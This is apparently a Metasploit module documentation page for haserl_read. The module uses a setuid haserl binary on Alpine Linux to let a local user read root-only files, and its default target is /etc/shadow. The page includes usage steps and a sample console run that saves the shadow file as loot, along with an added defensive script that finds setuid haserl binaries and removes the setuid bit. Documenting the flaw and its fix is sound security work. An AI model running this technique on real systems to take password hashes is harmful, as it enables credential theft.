e48ebe6659
- Add CVE and Ref. - Add fixed version
Vulnerable Application
Haserl is an unmaintained tool for using Lua as a CGI language in web servers. On Linux, when haserl is installed setuid root, it attempts to drop its privileges to the uid/gid of the owner of the CGI script, similar to suexec in Apache.
Haserl could have been a thing of the past, but it is used by Alpine Linux's Alpine Configuration Framework, which is commonly deployed on that distribution.
This module exploits the fact that invoking a setuid haserl on a file makes it not only change the effective UID to the file owner's, but also print the file's content, so files readable only by root are exposed to any local user.
This has been fixed in version 0.9.36.
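The precondition for this issue is a setuid haserl binary on the host. The following POSIX shell functions, an added example that is not part of the Metasploit module or of haserl, locate such binaries so they can be upgraded to 0.9.36 or later or have the setuid bit removed; the function names and the directories you pass are assumptions, not anything from the page.

```shell
#!/bin/sh
# Added example (not part of the Metasploit module): inventory setuid
# haserl binaries, which is the condition the module relies on.

# find_setuid_haserl DIR...
# Prints every regular file under the given directories whose name starts
# with "haserl" (haserl, haserl-lua53, ...) and has the setuid bit set.
# Returns 0 if at least one was found, 1 otherwise.
find_setuid_haserl() {
  # -perm -4000 matches files with the setuid bit; errors for missing
  # directories are discarded so a partial scan still reports results.
  matches=$(find "$@" -type f -name 'haserl*' -perm -4000 2>/dev/null)
  [ -n "$matches" ] && printf '%s\n' "$matches"
  [ -n "$matches" ]
}

# strip_setuid FILE
# Mitigation for hosts that cannot upgrade yet: clear the setuid bit so
# haserl runs with the web server's privileges only. Assumes the caller
# owns the file or is root.
strip_setuid() {
  chmod u-s "$1"
}

# Typical use: scan the usual binary directories.
# find_setuid_haserl /usr/bin /usr/sbin /usr/local/bin
```

Run the scan from a privileged shell so the directories are fully readable; any path it prints should be compared against the installed haserl version, and anything older than 0.9.36 upgraded or stripped of its setuid bit.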
Prerequisites
- Install Alpine Linux
- Install haserl
Verification Steps
- Start msfconsole
- Get a shell
- Do: `use post/linux/gather/haserl_read`
- Set `SESSION`
- Do: `run` or `exploit`
- Verify that the file was successfully downloaded
Options
RFILE
Remote file to download, defaults to /etc/shadow.
Scenarios
msf6 > use post/linux/gather/haserl_read
msf6 post(linux/gather/haserl_read) > show options
Module options (post/linux/gather/haserl_read):
Name Current Setting Required Description
---- --------------- -------- -----------
RFILE /etc/shadow yes File to read
SESSION 1 yes The session to run this module on.
msf6 post(linux/gather/haserl_read) > run
[!] SESSION may not be compatible with this module.
[+] Found set-uid haserl: /usr/bin/haserl-lua53
[+] Shadow saved in: /home/user/.msf4/loot/20210301204020_default_192.168.138.113_haserl_shadow_107368.txt
[*] Post module execution completed
msf6 post(linux/gather/haserl_read) >